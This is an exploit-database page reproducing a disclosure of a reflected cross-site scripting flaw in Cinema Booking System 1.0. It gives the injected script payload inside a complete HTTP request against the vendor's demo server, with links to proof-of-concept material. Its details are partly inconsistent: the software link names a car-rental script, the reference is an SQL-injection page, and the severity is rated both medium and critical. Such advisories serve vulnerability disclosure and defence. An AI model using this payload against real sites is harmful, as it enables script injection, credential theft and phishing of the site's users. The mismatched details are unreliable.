Advertisement






Cinema Booking System 1.0 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 N/A Medium
Author Risk Exploitation Type Date
N/A Medium Remote 2023-09-10
CVSS
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090036

Below is a copy:

Cinema Booking System 1.0 Cross Site Scripting
## Title: Cinema Booking System-1.0 XSS-Reflected
## Author: nu11secur1ty
## Date: 09/05/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/car-rental-script/
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The name of an arbitrarily supplied URL parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks. The payload kfimq"><script>alert(1)</script>k0a57 was
submitted in the name of an arbitrarily supplied URL parameter. This
input was echoed unmodified in the application's response. The
attacker can trick all users of this system into visiting a very
DANGEROUS URL address, and the worst thing is when they try to log in
to this system, by using his malicious link!

STATUS: HIGH-CRITICAL Vulnerability

[+]Testing Payload:
```
GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLogin
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html)

## Time spent:
00:17:00


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.